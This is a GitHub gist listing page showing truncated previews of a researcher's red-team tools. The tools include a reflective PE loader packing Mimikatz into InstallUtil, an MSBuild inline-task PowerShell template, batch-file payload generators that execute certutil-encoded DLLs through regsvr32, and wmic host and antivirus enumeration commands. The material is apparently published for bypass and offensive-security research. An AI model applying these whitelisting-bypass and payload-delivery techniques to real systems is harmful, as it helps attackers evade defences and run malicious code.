Skip to content

Instantly share code, notes, and snippets.

Avatar
🎯
Focusing

Chris Ross xorrior

🎯
Focusing
View GitHub Profile
@xorrior
xorrior / LoadMethodScanner.ps1
Created Aug 11, 2017 — forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
View LoadMethodScanner.ps1
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here: https://github.com/0xd4d/dnlib
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('FullName')]
[String]
[ValidateNotNullOrEmpty()]
@xorrior
xorrior / PELoader.cs
Created Jul 12, 2017
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
View PELoader.cs
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@xorrior
xorrior / pshell_template_embedded_script.xml
Created Dec 20, 2016
MSBuild Powershell Script XML template
View pshell_template_embedded_script.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
</PropertyGroup>
<Target Name="Hello">
@xorrior
xorrior / New-CplBatchFile.ps1
Last active Sep 20, 2017
Generate Batch file for cpl file
View New-CplBatchFile.ps1
function New-CplBatchFile
{
<#
.SYNOPSIS
Generates a batch file which will contain a certutil encoded, cab compressed payload.
.DESCRIPTION
The batch file will decode and decompress the cab file, then execute the dll within with regsvr32. You may modify the bat file to execute whatever you want.
Create payload:
@xorrior
xorrior / New-RegSvr32BatchFile.ps1
Created Oct 28, 2016
Generate a batch file to execute a dll with regsvr32
View New-RegSvr32BatchFile.ps1
function New-RegSvr32BatchFile
{
<#
.SYNOPSIS
Generates a batch file which will contain a certutil encoded, cab compressed payload.
.DESCRIPTION
The batch file will decode and decompress the cab file, then execute the dll within with regsvr32. You may modify the bat file to execute whatever you want.
Create payload:
@xorrior
xorrior / New-InstallUtilBatchFile.ps1
Created Oct 27, 2016
Generate InstallUtil payload within batch file for delivery
View New-InstallUtilBatchFile.ps1
function New-InstallUtilBatchFile
{
<##>
#You must provide an encoded payload using certutil -encode for the InFilePath.
#certutil -encode payload.exe payload.txt
#For compiling w/ a managed powershell runner
# C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:payload.exe payload.cs
[CmdletBinding()]
param
(
@xorrior
xorrior / wmic_cmds.txt
Last active Jan 20, 2021
Useful Wmic queries for host and domain enumeration
View wmic_cmds.txt
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
View keybase.md

Keybase proof

I hereby claim:

  • I am xorrior on github.
  • I am xorrior (https://keybase.io/xorrior) on keybase.
  • I have a public key whose fingerprint is A086 24A4 D702 0EAE FCEC 139D 56BA 7C93 A848 D2F7

To claim this, I am signing this object:

You can’t perform that action at this time.